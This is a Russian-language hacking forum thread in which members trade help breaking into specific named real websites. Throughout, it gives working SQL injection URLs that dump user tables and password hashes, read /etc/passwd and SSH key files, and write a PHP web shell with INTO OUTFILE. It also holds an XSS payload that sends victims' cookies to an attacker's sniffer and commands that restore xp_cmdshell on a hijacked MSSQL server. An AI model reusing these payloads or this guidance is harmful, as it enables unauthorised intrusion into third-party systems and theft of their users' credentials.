Есть, но там по-моему только бенчмарком инфу из бд доставать посимвольно, ибо идет два запроса

0nep@t0p, я бы так не утверждал .. 2 поля и причём вывод есть ;)
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+version(),1/*
4.1.22
на брут не ставил.. ибо мне это не к чему ..

тоесть в принципе можно поковырять до конца?:) может у кого еще какие варианты,?

Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?

Товарищи, будте внимательнее =)
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+concat_ws(char( 58),user_id,name,email,password,title,access),1+fr om+NEX_USERS+limit+0,1/*

Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?

Ну так для начала подари себе права админа, зайди в админку, через нее залей шелл, порутай систему и сможешь просматривать, под правами root все папки и файлы =)
PS Иначе никак, на то они и рутовские ;)

http://db.zenyro.ru/items/use.html'
Возможна ли инъекция?

DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..
http://db.zenyro.ru/items/use.html'+union+select+1,2,3,4,5,6,7,8,9,10--+

DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..

http://db.zenyro.ru/items/use.html'order+by+2--+
1 колонка..вывода нету..как слепую заюзать не удаётца

Проблема с:
http://www.mcmusic.ie/index.asp?secID=1'&part=1
Помогите раскрутить. Очень нужно :)

~EviL~
ms access, колонок 5, к системным таблицам доступа нет => узнавать имена таблиц\колонок только перебором... ;)
http://www.mcmusic.ie/index.asp?secID=-1+union+select+1,2,3,4,5+from+tbl_logins

Спасибо :) Попробую довести до победного конца =)

в этом деле новичок.
еще пока не научился использовать XSS но уже нашел парочку. может кому пригодится кто шарит в этом.
http://img146.imageshack.us/img146/1188/87057452zf9.png (http://img146.imageshack.us/my.php?image=87057452zf9.png) http://img146.imageshack.us/img146/87057452zf9.png/1/w981.png (http://g.imageshack.us/img146/87057452zf9.png/1/)

там в нескольких нужно вбивать в поля.
PS/ сильно не пинать я только учусь. ;)

а чо там использвать - втавляй вместо alert('xss') такой код:

window.location.href='http://твой_сайт/s.gif?'+document.cookie;

где s.gif - твой снифер

и давай такую ссылку, чтобы он по ней тыцкнул тому, чьи куки хочешь поиметь

с перенаправлением галимо и палевно. Лучше создавать картинку посредством яваскрипт

Есть сервер с багнутым ПОСТ запросом.
Login, pwd.
Баг в первом варианте. Причем надо чтоб было хоть что - либо во втором.
Пример:

Login: ' or 1=(@@version)--
Pwd: kakawka

:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.


Что посоветуете в данном вопросе? (чтоб вывело результат первого запроса)

У меня сейчас подобная проблема. При вводе вышеуказанной комбинации сервер отвечает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or1=1--' AND (IsNull(CodAff) OR CodAff='')' at line 1

/login.asp, line 16
Пробелы он не воспринимает. Как можно указать пробелы? Пытался
'%25or%151=1-- таки бестолку.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND (IsNull(CodAff) OR CodAff='')' at line 1

Как можно указать пробелы?
1'or'1'='1'
1)or(1)=(1)
1'or'1'='1
и т.д

Пробелы как таковые не нужны вообще

Аналоги ПРОБЕЛА:
+ или %2B

хм. +, либо еще /**/ бывает прокатывает

Если инъекция в пост запросе, ты плюсы ставишь? На сколько я заметил, там плюc канает за плюс и тд :) то есть:
1' or 1=(select user)+char(0x7e) выдаст : 'dbo~'

На недельке как налажу регексы планирую выложить свой софт для mssql инъекций.

Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp

Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp
ник') or 1=1--(пробел)

может не в тему чуток..но всё таки..чем напарсить линки для брута фтп?
да и Брутусае2 залейте...а то удалил его..

Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(

Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(

union select 1,<? system($_GET[cmd]); ?>,3 from users into outfile '/www/site/temp/shell.php'/*

p.s: https://forum.antichat.ru/showthread.php?t=34338

Login: ' or 1=(@@version)--
Pwd: qwerty

exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', '' or 1=(@@version)--', 'qwery'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Вот часть запроса выудил. Как можно сформировать запрос чтоб получить результат?

SHS попробуй войти вод админом )

exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', 'admin or 1=1--', 'pass'

столкнулся с проблемой, делаю union select into outfile '1.txt' оно его сохраняет в папку var/db/mysql/ но это на уровень выше чем то где находится сам сайт, короче вот так http://aaa.ru/1.txt на него не зайдеш он где то ближе лежит, вопрос как узнать где лежит сайт? там можно без полного пути, начиная с var/

InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах

InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах
а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
https://forum.antichat.ru/showthread.php?t=49775

InvisibleSM, Прорекламирую мою тулзу тебе в помощь =\

https://forum.antichat.ru/thread79411.html

hi

sorry for english

is this hackable

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43&PostID=4186769

waitting>>>>>>>>>>>

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43'&PostID=4186769 hmmmm
it may well be that filtration ' ! Not good!!!

-------------------------------------------
No man!!!it cannot be said : this unhackable! Search some different ways!!!

блин забыл самое главное написать, там нет выводимых полей там бага в мейл поле при регистрации поэтому только аут файл могу сделать

во что пишу

' union select passhash from users where id=1 into outfile '/tmp/1.txt'/* -- @bla.ua

а прочитать терь как, хз

на ошибки гуглил, нету

[QUOTE=DimOnOID]а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
/QUOTE]

У мя конфиги не читались на фряшке =_=,точнее,на двух.Пад рутом...

Народ помогите разобрать что то непонимаю что к чему http://www.viper-shop.dk/category.php?id=180'

Ругается что не правильный синтаксис и все тут. Уже все перепробовал. В чем ошибка?

http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...

http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
чтото я не понял сути поста .. может мне тоже учится пойти надо...
кол-во колонок, обычно так ищут ..
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*
так что делаем вывод, 15 колонок .. можно в ошибке посмотреть кол-во колонок, но там не то колво, ибо c.*
вывода не добился..
лучше поискать на сайте ещё скули, возможно проще будет, ну или эту поковырять ещё ..

http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...
ну тогда зайди и посмотри выводhttp://www.viper-shop.dk/category.php?id=180+and+1=1иhttp://www.viper-shop.dk/category.php?id=180+and+1=0отличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?

ну тогда зайди и посмотри выводиотличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?

вот эти два вывода разные:

http://www.viper-shop.dk/category.php?id=179'+AND+'1'='1
http://www.viper-shop.dk/category.php?id=179'+AND+'1'='0

инъекция там есть.

Там есть иньекция, но перебирать придется вслепую, так как там сложный запрос с left join, фильтр там /*

http://www.viper-shop.dk/category.php?id=180%27+union+select+1/*

потому что если подставить

http://www.viper-shop.dk/category.php?id=180%27+union+select+1--

то совсем другой рез-т. Т.е. с этой ссылкой надо поработать как с Blind SQL-inj

gisTy
читай мой пост! если скажешь что это не иньекция, то я сьем свой тапок!
http://www.viper-shop.dk/category.php?id=180'+order+by+15/*
и
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*

-------------
как сказал Pashkela, тут слепая иньекция, да ещё и 4ая ветка
http://www.viper-shop.dk/category.php?id=180'+AND+SUBSTRING((select+version ()),1,1)='4
тк кк Access denied for user 'viper-shopdk'@'%' to database 'mysql' то тут надо перебирать таблы .. мне лень, еси кому то интересно - удачи ))

сори.. это я ступил малость..

Не могу окончательно понять понять что означает:
Пример:
union+select+1,3,4,5,6,7,8,9/*
union+select-(Выбрать из базы)
А что означают 1,2,3,4,5,6,7,8,9 Поля в таблице?

geforce, иди почитай
https://forum.antichat.ru/thread43966.html

geforce, иди почитай
https://forum.antichat.ru/thread43966.html
Я уже милион раз читал это! Мне нуген ответ на вопрос

Вот запрос к базе пример:

mysql_query (SELECT * FROM название таблицы)

когда я пишу union select 1,2,3,4,5,6,7,8,9 какую роль играют эти цыфры?

И вопрос:

Существует ли способ обойти функцыю htmlspecialchars(); если да то как?

2 geforce
значит прочитай ещё раз ..
там всё написано .. если сам поймёшь - значит действительно поймёшь .. а так, забудешь - на завтра.

Еще это следует почитать http://www.ipmce.su/~lib/osn_prav.html#0008

При чтении load_file-ом нашёл публичные ключи в ./root/.ssh/authorized_keys:

bЃ .authorized_keys.nV0WVg bЃ И
authorized_keys

Справа отчётливо имя файла authorized_keys,а слева что за херня ? Юзал SIPT 4.0

Система - FreeBSD

И ещё: кучу всякого в var/tmp валяется,включая идентификаторы сессий.

mysql-5.tgz к примеру.

Не могу окончательно понять понять что означает:
Пример:
union+select+1,3,4,5,6,7,8,9/*
union+select-(Выбрать из базы)
А что означают 1,2,3,4,5,6,7,8,9 Поля в таблице?

Ну да, колонки в таблице.
Подбирать их следует, т.к. перед union есть опред. кол-во столбцов и после union - должно быть столько же.

Существует ли способ обойти функцыю htmlspecialchars(); если да то как?

А чё её обходить,если она и так не работает : DD

geforce

для хсс врятле обойдеш... скуля хз, помоему тоже..

есть тема уже, о ее безопастности )
https://forum.antichat.ru/showthread.php?t=64500

Если аргумент не в кавычках то скулю можно забомбить

Я уже милион раз читал это! Мне нуген ответ на вопрос

Вот запрос к базе пример:

mysql_query (SELECT * FROM название таблицы)

когда я пишу union select 1,2,3,4,5,6,7,8,9 какую роль играют эти цыфры?

Это кол-во полей, количество которых ты проверял к примеру так: +order+by+9/*
Цифра 9 - максимальное значание, при котором не вылетает ошибка мускуля. Значит пишешь +union+select+1,2,3,4,5,6,7,8,9/*
Если бы при 9 вылетала уже ошибка, а пк примеру при 5 нет... Значит будет 5 полей. То есть +union+select+1,2,3,4,5/*

Помоему на простые вопросы есть банально простой раздел... Может я ошибаюсь?

Помогите с интересным сайтом. это mp3real.ru. Дырявый, шопи**ец. Ничерта в поиске не фильтруется... нашел пассивную xss
http://www.mp3real.ru/search/?type=art&q="><script>alert()<script>
и нашел вроде бы sql inj , но не уверен. Если и скуль, то очень странный. Ошибку вызывает запрос
http://www.mp3real.ru/search/?type=art&q=<'' (две одиннарные)
Вопрос - как развернуть inj? У кого-нить есть предложения по этому поводу?

AARON,нету там sql иньекта...

Подскажите, есть инъекции или нет.. непойму, вроде все "признаки" указывают на скулю, а вот что тто даже рабочие поля выявить не получается :(
http://smartlip.com/symbian/fileshare/flist.php?cat=1'
http://smartlip.com/adv/?id=1'
Заранее, спасибо!

http://smartlip.com/symbian/fileshare/flist.php?cat=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +information_schema.tables--%20%201
слепая скул

А как тогда что то выводить? :/
или если скуля слепая, то все бесполезно?

http://forum.antichat.ru/showthread.php?t=43966 пункт 3.ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ.

Доброе время суток!
Кто можеть подсказать как юзать скул ошибку!
http://img.pixs.ru/images/msqlJPG_2913333_120791.jpg
Дело было так я использовал эксплойт для определение верси с античат с темы:Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Вот сам так скажем эксплойт
http://img.pixs.ru/images/msql4521JP_2629102_120798.jpg

И когда я использовал эксплойт то пройжошла мускул ошибка!

Как можно юзать эту мускул ошибку !
Какие сценари можео выполнять с помощью этой ошибки!

Версия самого движка 5.2.1

Зарание всем спосибо!

извеняюсь за ошибку там я имею введу скул ошибку а не мускул!

смотри ответ в теме которую ты создал... ;)

p.s: Вместо [sql] ты должен подставить свой SQL - запрос
например
union select concat(username,0x3a,password) from jos_users

статьи читай, все ведь расписано...
https://forum.antichat.ru/showthread.php?t=43966
https://forum.antichat.ru/showthread.php?t=29369

http://smartlip.com/symbian/fileshare/flist.php?cat=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +information_schema.tables--%20%201
слепая скул
Спасибо! Не подскажите, если вы пользовались прогой Marathon Tool (как раз для blind-SQL), то там в поле "Target base URL" нужно вводить просто http://smartlip.com/symbian/fileshare/flist.php?cat=1 или http://smartlip.com/symbian/fileshare/flist.php?cat=-1' ?

А то что то я вручную найти таблицы не смог, да и прога почему то не хочет :(

Для определения БД пробовал такие варианты:
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)>1--%20%201
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)<5--%20%201
http://smartlip.com/symbian/fileshare/flist.php?cat=1+and+substring(version(),1,1)=5--%20%201
И во всех результатах ничего не выводится, точнее ошибок не выводится..

помогите раскрутить скуль
hххp://kpi.ua/board/index.php?action=list_messages&section_id=2&module=1'

http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+concat_ws(0x2f,name,pwd)+from+docum ent.nuke_authors+limit+0,1--


http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+load_file(0x2F6574632F706173737764)--

Помогите залить шелл на предидущий пост))
Ковычки не фильтрует и дает читать /etc/passwd
http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+load_file(0x2f6574632f6170616368653 22f68747470642e636f6e66)-- - содержание httpd.conf - вроде как тут должны буть всякие диры... или полный путь... но я не нашел((
http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+'123'+from+mysql.user+into+outfile+ '/board/123.txt'-- - пробывал такой запрос - не получилось(( Видимо нужен полный путь, а я его никак найти не могу((

Tigger тебя интересует реальный путь к серверу ?

2 Tigger:

http://kpi.ua/board/index.php?action=list_messages&section_id=2&module=1'


/usr/hosting/www.ntu-kpi.kiev.ua/data/common/include-board/Query.class


mysql user:
hellcat
-------
mysql password:
*155D9B0E48F5A1A1981B225E4C8D9C2A2A87E608
-------
file_priv:
Y

2 Tigger:

http://kpi.ua/board/index.php?action=list_messages&section_id=2&module=1'



mysql user:
hellcat
-------
mysql password:
*155D9B0E48F5A1A1981B225E4C8D9C2A2A87E608
-------
file_priv:
Y

mysql.user и я сам нашел и через нее тоже пробывал. А это не реальный путь... нету на сайте папки /data/ и коммон тоже нету... бред это... даже доменя имя другое =/

mysql.user и я сам нашел и через нее тоже пробывал. А это не реальный путь... нету на сайте папки /data/ и коммон тоже нету... бред это... даже доменя имя другое =/

http://kpi.ua/job/index.php?action=list_messages&section_id=-3+union+select+load_file('/usr/hosting/www.ntu-kpi.kiev.ua/data/common/include-board/Query.class')/*
какой же это бред? ...повезло..даже ковычГи проходят...исчи папку для записи..и го шелл...

mysql.user и я сам нашел и через нее тоже пробывал. А это не реальный путь... нету на сайте папки /data/ и коммон тоже нету... бред это... даже доменя имя другое =/

Путь реальный, просто надо найти папку с соответствующими правами

Подскажите, как такую SQL- инъекцию раскрутить:
http://eve-zone.ru/?mode=quest&submode=0&s=1&p=-1
Не получается подобрать кол-во полей, все время ошибка вылазит..

Thrasher88
Подскажите, как такую SQL- инъекцию раскрутить:
inj в LIMIT, не раскрутишь... =\

А вот эта:
http://www.xyligan.ru/blogs/blog.php?readpost=-1'
Вроде бы что то схожее...

Путь реальный, просто надо найти папку с соответствующими правами
А где ты нашел этот реальный путь? В каких конфигах?
Да и чего-то ничего не получается(( Всякие разные папки попробывал(( Ни выходить никак

Доброе время суток!
Что можно с этим сделать есть скул иньекция на этом сайте !
Движок jomla версия помоему либо 1.1 либо 5.2.1
http://aing.kz/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=1&user_rating=1,rating_sum=[sql]
Кто может помочь как залить шел или что-то плиз помогите!

А еше забыл еше отметить вход админ ку можно через http://aing.kz/administrator
Заранее спасибо!

Чёт у меня не открывается твой сайт=((
Ты урл правильно указал???

Доброе время суток!
Что можно с этим сделать есть скул иньекция на этом сайте !
Движок jomla версия помоему либо 1.1 либо 5.2.1
http://aing.kz/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=1&user_rating=1,rating_sum=[sql]
Кто может помочь как залить шел или что-то плиз помогите!

А еше забыл еше отметить вход админ ку можно через http://aing.kz/administrator
Заранее спасибо!
http://whois.domaintools.com/aing.kz

Server Data
Domain Status: Registered And No Website

Error Message
Domain or IP Address Not Found

А где ты нашел этот реальный путь? В каких конфигах?
Да и чего-то ничего не получается(( Всякие разные папки попробывал(( Ни выходить никак


Xspider-ом. Он если чо пишет, вряд ли ошибается. Вот по такой ссылке:

http://kpi.ua/board/index.php?action=list_messages&section_id=2&module=1'

реальный путь к серверу. А почему подтверждается, что он реальный - написано выше

Прошелся сканером по папкам, в принципе писать можно в http://kpi.ua/files/, но там почему-то пхп файлы не исполняются ( наверное, в хтакцесе что-то нехорошее прописали), но сканер выдал несколько интересных папок. Ближе к делу -
http://kpi.ua/board/index.php?action=list_messages&section_id=-1+union+select+0x3C3F70687020706870696E666F28293B2 03F3E+from+mysql.user+into+outfile+'/usr/hosting/www.ntu-kpi.kiev.ua/data/2/photo/xekinfo.php'--

http://kpi.ua/2/photo/xekinfo.php
Дальше сами...

подскажите дампер скуль..не сипт..

такая ошибка что-нибудь полезное означает?
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 3 in /home/guroob/public_html/bar-exclusive/index.php on line 12

например: http://www.bar-exclusive.ru/index.php?id=-1

ЗЫ: контрол + а, ибо черное на черном

Раскрытие путей..

Назрел у меня вопрос.
В общем поимел я один MSSQL сервер. Добавил юзера в бд с правами sysadmin. Через клиента приконектился...
При выполнении запроса exec xp_cmdshell .... Вылезает ошибка следущего ввида:

-------------------
Сообщение 0, уровень 16, состояние 0, процедура xp_cmdshell, строка 1
Cannot load the DLL 123, or one of the DLLs it references. Reason: 126(error not found).
-------------------

Что бы это могло означать?
Как мне показалось ищет не ту ДЛЛ'ку и не там где надо. Как это исправить? :)

-------

Ситуация немного прояснилась.

Админ прописал несуществующую ДЛЛ "123".
Родная библиотека для xp_cmdshell : xplog70.dll
Я восстановил все как положено запросами вида:

exec sp_dropextendedproc 'xp_cmdshell';
exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

Но к сожалению не только было указанно неправильное название либы, но и нет её. По крайней мере там, где ищет SQL сервак.
Есть какие-либо варианты в данном случае? Или сушить вёсла?

З. Ы. Моя цель - выполнение команд.

Подскажите метод проведения SQL-инъекций через POST.
К примеру, нашел я файл index.php с уязвимым параметром get. Как осуществить инъекцию?

мм.. обычно ..
посылаешь пакет изменённый и всё ))

Ну это ясно... я где то читал что HTTP заголовок нужно переделывать.. что то в этом роде. А можно пример какой-нибудь.. гугл что то не хочет искать подобное :(

Ну это ясно... я где то читал что HTTP заголовок нужно переделывать.. что то в этом роде. А можно пример какой-нибудь.. гугл что то не хочет искать подобное :(
Качаешь две проги
1) Naviscope
2) InetCrack
Врубаешь 1ую прогу и заходишь на сайт и вбиваешь что либо в уязвимом get. Naviscope перехватывает пакет
Потом врубаешь InetCrack и перехваченный пакет вставляешь туда. И там уже развиваешь скуль)) Удачи!!!

В идеале если юзаешь firefox, то есть плагин полезный. http://livehttpheaders.mozdev.org/

помоему проще юзать скрипт мэднета, поищи на madnet.name
да и не факт что будет работать через пост если в скрипте определено что переменная получает значение через гет
$var = $_GET['var']

http://dcmp.bc.edu/news.php?id=433+and+substring(version(),1,1)=3/*

Крути :D

Нужен человек, который хорошо разбирается в blind sql... Напиши, пожалуйста, в аську... 5703828

Народ, какой аналог команды id (unix) в винде есть? Если таковой есть вообще. Чтобы узнать текущего пользователя / права.

в linux совсем другая система распределения прав.. ;)

Чтобы узнать текущего пользователя / права.
в винде когда cmd запускаешь, всегда оказываешся в папке с именем юзера, т.е
D:\Documents and Settings\Admin>
имя можно еще так узнать:

D:\Documents and Settings\Admin>%username%
"Admin" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.


Права на файлы можно командой ATTRIB посмотреть... ;)

Поповоду D:\Documents and Settings\Admin>
У меня не тот случай, я через скуль. А в остальном спасиб, помогло.

сорри совсем за нубовские вопросы, но все же ... читаю-читаю, но пока многого не догоняю

вот допустим нашел я пхп инъекцию ( http://сайт/index.php?p=http://google.com )
ага, гугля отображается ... что дальше? вгружаем шелл.

на сервак залил файл шелла и пытаюсь инклудить
1) http://сайт/index.php?p=http://шелл.php - шел открывается, но показывает мой сервак ... получается скрипт выполняется на моем серваке!? и зачем мне это?

2) пробудем так (где-то читал) http://сайт/index.php?p=http://шелл.txt

тупо в окне браузера выдает содержание txt'шного файла ... так как же все-таки заинклудить шелл?


И еще вопросец:

Почему уязвиость вида
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
называют PHP - include'ом и вообще какой от нее толк? Пассов же там нет никаких ... А что мы можем, просто узнав, какие файлы на серваке??

Всем заранее спасибо, прошу сильно меня не пинать ;)

rip86
http://сайт/index.php?p=http://шелл.txt - это видимо просто фрейм или чтто типо того ..
инклуд шелла, происходит если в скрипте было бы прописано include($_GET['p']); или нечто подобное ..
а тут чтото вроде echo '<iframe src="'.$_GET['p'].'"></iframe>';
---------
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
ну конечно смотря какие права есть .. но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..

точно, сорри, там фрейм был ... а на другом через серч форму сайт инклудился
ясно, вобщем при реальном инклуде с шелл.txt должно работать все?

http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd

... пассы от мускуля/админок чтоб шелл залить ..

А где их можно поискать и как? Слышал про то, что пассы иногда хранятся в etc/shadow , Но на практике такого не видел ...

оч редко быват, что есть права прочитать файлы из шадоу .. да и не обязательно в шадоу ..

пути искать в ошибках, попробуй ввести заведомо ложный путь..
поищи в гугле "site:сайт.ком AND warning OR mysql OR include" итд ..

то есть?

ну допустим возьмем инъекцию
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00

что нам дают эти данные? что дальше?

пути искать в ошибках, попробуй ввести заведомо ложный путь..
поищи в гугле "site:сайт.ком AND warning OR mysql OR include" итд ..

site:www.cs.rmit.edu.au AND warning OR mysql OR include

а что в итоге мы ищем?

rip86, читай внимательнее
но можно найти пути по ошибкам, потом поискать конфы сервера, пассы от мускуля/админок чтоб шелл залить ..

можно залить картинку с шелом и её проинклудить к примеру

ну допустим возьмем инъекцию
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00


Что-что, если есть sql-inj на этом же сайте, то данная информация может нам помочь загрузить шелл через скулю, потому что других путей узнать реальный путь к серверу может и не быть. В этой же теме странички две-три назад Tigger приводил неплохой пример SQL-inj с использованием загрузки /etc/passwd, который был доведен до победного конца. Читай тему

rip86, читай внимательнее

поверь, я перечитываю по несколько раз ;)
просто реально не понимаю, что нам дает этот запрос в гугле ... что значит найти пути по ошибкам и где искать пассы админок ... :(

сорри, говорю же, я нуб
мб статейку какую-нибудь мне посоветуете прочитать? читал много, но они либо совсем поверхностные, либо совсем уж углубленные (не для новичка вобщем).


Spyder
можно залить картинку с шелом и её проинклудить к примеру

а почему бы тогда не инклудить сразу шелл, зачем в картинку прятать? или ты имеешь ввиду залить картинку на тот сервак, который ломаем посредством админки?

Что-что, если есть sql-inj на этом же сайте, то данная информация может нам помочь загрузить шелл через скулю, потому что других путей узнать реальный путь к серверу может и не быть. В этой же теме странички две-три назад Tigger приводил неплохой пример SQL-inj с использованием загрузки /etc/passwd, который был доведен до победного конца. Читай тему

ок, пошел читать :)

просто не особо пока хотел вникать в sql-inj , хотел сначала с пхп inj разобраться полностью ... но чувствую придется

а почему бы тогда не инклудить сразу шелл, зачем в картинку прятать? или ты имеешь ввиду залить картинку на тот сервак, который ломаем посредством админки?
если инклуд локальный, и на сайте есть к примеру рега для юзеров и можно залить аватар или чтото типо того, то можно с картинкой залить шелл, ну а потом и использовать ))

--
немного поиска по форуму)
https://forum.antichat.ru/thread23501-php+%E8%ED%EA%EB%F3%E4.html

2 159932, спасибо

Подскажите, я несколько раз, ломая сайт через SQL-инъекцию, наталкивался на админку, авторизация в которой выглядит как системное сообщение (поверх окна, наверняка многие с этим сталкивались..) с полями Имя пользователя и Пароль. Почему то ни в одном случае не получалочь войти в админку, несмотря на то, что логин и пароль введены верно: после ввода появляется ошибка Authorization Required. Во всех остальных случаях авторизация проходит нормально, такая проблема только с подобным видом авторизации. Почему такое может происходить? Вход в админку возможен только с определенного IP? Или что то другое..?

эти пароли хоаняться в файле htpasswd ....

То есть при уязвимости в SQL с такой авторизацией получается я никак пассы не достану..? :/ Странно, а зачем же тогда поле Passwd в таблице пользователей сайта..

и еще вопрос: нашел скулю вида:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,v ersion(),user(),database()),11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38--%20%201
Хочу соответственно узнать логин и пасс юзеров, ввожу:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u sername,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8+from+c_users--%20%201
И мне видается ошибка Table 'siteru.c_users' doesn't exist
То есть такой таблицы не существует? Но я же точно знаю, что она есть... и все названия таблиц и колонок правельные! :(

эти пароли хоаняться в файле htpasswd ....
не факт, по крайней мере с Apache.
вот почитайте
http://www.softtime.ru/article/index.php?id_article=27

Thrasher88, проблема в ДБ, в которой находится нужная таблица. Узнавай шема наим!

Узнавай шема наим
правильно ли я делаю? Ввел:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,table_schema,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+information_sc hema.tables--%20%201
Появилось, я так понимаю, это самое schema name, попробовал с этим названием:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u sername,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8+from+worldsru.c_reg_users--%20%201
Все равно пишет, что Table 'worldsru.c_reg_users' doesn't exist :( Попробовал поперебирать через LIMIT - всего 2 имени - собственно само information_schema и это worldsru ((

Ты не указал, у какой таблицы хочешь узнать table_schema, чтобы узнать нужную, выполни запрос
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,table_schema,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+information_sc hema.tables+where+table_name='c_reg_users'--%20%201

Thrasher88
Вот рабочий запрос:

http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u sername,password),11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8+from+aphorism.c_reg_users/*
база: aphorism
nazar:4afd521d77158e02aed37e2274b90c9c

А вот все базы их там 10 шт:
http://www.site.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,schema_name,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38+from+information_sch ema.schemata+limit+9,1/*

как можно узнать полный путь к корню сайта?

поищи ошибки .. понаставляй кавычки итд .. чтоб добиться ошибки, и может повезёт ..
также гугл тебе в помощь .. ибо в его кеше, часто сохнаряются ..

masternet, можешь поискать ошибки на сайте, обычно в них можно найти. А так сканером вполне вероятно узнать...

как можно узнать полный путь к корню сайта?
Найти раскрытие путей, правда если включен вывод ошибок

Можно узнать, вызвав какую-нибудь ошибку в скрипте(через скуль, инклуд)

Можно узнать, вызвав какую-нибудь ошибку в скрипте(через скуль, инклуд)
Зачем уж сразу скуль, инсклуд \ etc) хватит и к примеру md5($_POST['passwd']), &passwd[]=asd

да не..чз скуль как узнать полный путь к корню сайта?
load_file('/') не катит(

да не..чз скуль как узнать полный путь к корню сайта?

если ты про тот же сайт, про который меня вчера в ЛС долбил, то просто удали из запроса например номер последней колонки - будет ошибка и покажет полный путь

да не..чз скуль как узнать полный путь к корню сайта?
Если только File_priv Y ....(то есть можешь прочитать допустим /etc/passwd) ...Найти конфиги апача.....
Ну или из ошибок(если там конечно будет показан полный путь..)

если ошибок совсем нет, иногда переменные @@basedir и @@datadir позволяют угадать путь)

